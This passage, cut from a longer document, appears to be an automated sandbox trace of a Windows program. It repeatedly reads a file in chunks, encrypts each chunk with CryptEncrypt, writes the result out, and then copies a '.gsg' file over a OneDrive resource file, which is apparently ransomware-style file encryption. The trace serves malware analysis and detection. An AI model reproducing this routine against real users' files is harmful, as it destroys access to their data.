(in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.263] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.263] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.263] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.263] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.263] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.263] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.263] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.263] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.263] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.264] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.264] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.264] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.264] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.264] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.264] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.264] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.264] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.264] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.264] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.264] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.264] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.265] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.265] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.265] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.265] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.265] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.265] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.265] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.265] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.265] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.265] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.266] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.266] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.266] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.266] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.266] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.266] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.266] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.266] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.266] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.266] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.266] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.266] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.266] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.266] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.267] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.267] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.267] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.267] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.267] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.267] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.267] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.267] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.267] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.267] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.267] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.267] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.267] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.267] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.268] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.268] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.268] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.268] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.268] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.268] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.268] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.268] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.268] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.268] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.268] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.268] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.268] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.268] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.269] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.269] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.269] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.269] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.269] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.269] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.269] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.269] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.269] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.269] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.269] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.269] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.269] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.269] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.270] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.270] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.270] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.270] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.270] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.270] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x350, lpOverlapped=0x0) returned 1 [0279.270] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x350, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x360) returned 1 [0279.270] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x360, lpOverlapped=0x0) returned 1 [0279.270] CloseHandle (hObject=0x5d48) returned 1 [0279.270] CloseHandle (hObject=0x5d3c) returned 1 [0279.270] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kn\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kn\\FileSync.LocalizedResources.dll.mui" (normalized: 